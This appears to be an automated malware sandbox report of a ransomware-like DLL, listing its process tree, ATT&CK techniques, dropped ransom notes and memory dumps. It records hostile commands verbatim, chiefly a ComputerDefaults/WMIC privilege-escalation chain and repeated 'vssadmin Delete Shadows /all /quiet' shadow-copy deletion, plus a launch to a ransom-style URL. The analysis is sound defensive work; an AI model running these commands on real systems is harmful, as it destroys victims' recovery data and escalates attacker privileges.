C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3824
- C:\Windows\system32\cmd.exe
  cmd /c "start http://8e8058f848685690fedihlxbl.uponmix.xyz/dihlxbl^&1^&29871583^&73^&325^&2219041"
  2⤵
  PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://8e8058f848685690fedihlxbl.uponmix.xyz/dihlxbl&1&29871583&73&325&2219041
    3⤵
    PID:5612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x118,0x128,0x7ffb5cd646f8,0x7ffb5cd64708,0x7ffb5cd64718
      4⤵
      PID:4740
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3188
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1220
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1296

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:940

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2488
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3464
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1700

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.bin.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:3608
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:796
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:2560
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4256
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4972
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:996
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4076
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1852

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3840
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4556

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Suspicious use of WriteProcessMemory
PID:3276
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3276 -s 984
  2⤵
  - Program crash
  PID:3888
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3276 -s 984
  2⤵
  - Program crash
  PID:4788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:632
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:404
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4888
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4208

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3588

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3796
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3740
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4008
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:224
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2164

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3172
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2372
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5064
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1996
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2548

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:3376

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3492
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4120
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4560
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4664
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2536
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3276 -ip 3276
1⤵
PID:1404

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5156
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4592
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1808

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5308
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2412
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3444

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5300
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2584
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1636

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5292
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4276
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3272

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5276
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:760
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3896

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5284
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4600
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5112

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5268
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4916
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3836

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5260
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:752
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1868

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5252
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4648
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4188

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5244
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3760
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1632

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5236
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4340
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1488

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5188
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5020
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5536

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5228
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2840
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3480

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5316
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2160
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1996

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5220
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4040
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3160

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5212
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3488
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2372

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5196
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3108
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:224

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5644
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1792

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5332
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4100
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2840

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5324
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1284
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1496

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6712

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6696

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6704

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6688

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6808

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6764

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6728

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6736

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6720

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6744

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6860

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6936

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6980

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6992

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:7032

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:7128

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:7156

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6276

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1288

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

Filesize
1KB

MD5
5f5af898832069d72f1c7e3997e6b9be

SHA1
d45a778e7bb93c86485d50d9368cf82eb9ed000c

SHA256
9e826938a4b175fac4811b6e414fb8237f4a0d7c842db5851af5c2be3de99122

SHA512
37872c721e9ce23bd1c5b073f3f9ff743e255df73f04edc874af81b40b09cf07af14184c855ebc5607c81937a4d387dee8f5c4113633dec77b7fed4cac2c0063

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/224-169-0x0000000000000000-mapping.dmp

Download
memory/404-172-0x0000000000000000-mapping.dmp

Download
memory/632-159-0x0000000000000000-mapping.dmp

Download
memory/752-185-0x0000000000000000-mapping.dmp

Download
memory/760-186-0x0000000000000000-mapping.dmp

Download
memory/796-167-0x0000000000000000-mapping.dmp

Download
memory/940-158-0x0000000000000000-mapping.dmp

Download
memory/956-134-0x0000000000000000-mapping.dmp

Download
memory/996-153-0x0000000000000000-mapping.dmp

Download
memory/1220-140-0x0000000000000000-mapping.dmp

Download
memory/1296-146-0x0000000000000000-mapping.dmp

Download
memory/1652-141-0x0000000000000000-mapping.dmp

Download
memory/1700-152-0x0000000000000000-mapping.dmp

Download
memory/1852-160-0x0000000000000000-mapping.dmp

Download
memory/1916-150-0x0000000000000000-mapping.dmp

Download
memory/1988-142-0x0000000000000000-mapping.dmp

Download
memory/1996-164-0x0000000000000000-mapping.dmp

Download
memory/2160-196-0x0000000000000000-mapping.dmp

Download
memory/2164-177-0x0000000000000000-mapping.dmp

Download
memory/2224-178-0x0000000000000000-mapping.dmp

Download
memory/2260-154-0x0000000000000000-mapping.dmp

Download
memory/2340-130-0x000002438B1B0000-0x000002438B1B4000-memory.dmp

Filesize
16KB

Download
memory/2372-163-0x0000000000000000-mapping.dmp

Download
memory/2536-171-0x0000000000000000-mapping.dmp

Download
memory/2548-175-0x0000000000000000-mapping.dmp

Download
memory/2560-157-0x0000000000000000-mapping.dmp

Download
memory/2584-181-0x0000000000000000-mapping.dmp

Download
memory/2840-190-0x0000000000000000-mapping.dmp

Download
memory/3108-189-0x0000000000000000-mapping.dmp

Download
memory/3188-147-0x0000000000000000-mapping.dmp

Download
memory/3208-149-0x0000000000000000-mapping.dmp

Download
memory/3404-143-0x0000000000000000-mapping.dmp

Download
memory/3464-155-0x0000000000000000-mapping.dmp

Download
memory/3488-184-0x0000000000000000-mapping.dmp

Download
memory/3492-133-0x0000000000000000-mapping.dmp

Download
memory/3608-156-0x0000000000000000-mapping.dmp

Download
memory/3740-168-0x0000000000000000-mapping.dmp

Download
memory/3760-187-0x0000000000000000-mapping.dmp

Download
memory/3824-136-0x0000000000000000-mapping.dmp

Download
memory/3840-131-0x0000000000000000-mapping.dmp

Download
memory/3888-135-0x0000000000000000-mapping.dmp

Download
memory/4008-176-0x0000000000000000-mapping.dmp

Download
memory/4032-162-0x0000000000000000-mapping.dmp

Download
memory/4040-191-0x0000000000000000-mapping.dmp

Download
memory/4076-165-0x0000000000000000-mapping.dmp

Download
memory/4100-194-0x0000000000000000-mapping.dmp

Download
memory/4208-173-0x0000000000000000-mapping.dmp

Download
memory/4256-166-0x0000000000000000-mapping.dmp

Download
memory/4332-138-0x0000000000000000-mapping.dmp

Download
memory/4340-193-0x0000000000000000-mapping.dmp

Download
memory/4556-132-0x0000000000000000-mapping.dmp

Download
memory/4560-170-0x0000000000000000-mapping.dmp

Download
memory/4564-151-0x0000000000000000-mapping.dmp

Download
memory/4592-188-0x0000000000000000-mapping.dmp

Download
memory/4600-180-0x0000000000000000-mapping.dmp

Download
memory/4648-182-0x0000000000000000-mapping.dmp

Download
memory/4664-179-0x0000000000000000-mapping.dmp

Download
memory/4756-139-0x0000000000000000-mapping.dmp

Download
memory/4888-161-0x0000000000000000-mapping.dmp

Download
memory/4916-195-0x0000000000000000-mapping.dmp

Download
memory/4944-144-0x0000000000000000-mapping.dmp

Download
memory/4972-148-0x0000000000000000-mapping.dmp

Download
memory/5020-192-0x0000000000000000-mapping.dmp

Download
memory/5064-174-0x0000000000000000-mapping.dmp

Download
memory/5644-183-0x0000000000000000-mapping.dmp

Download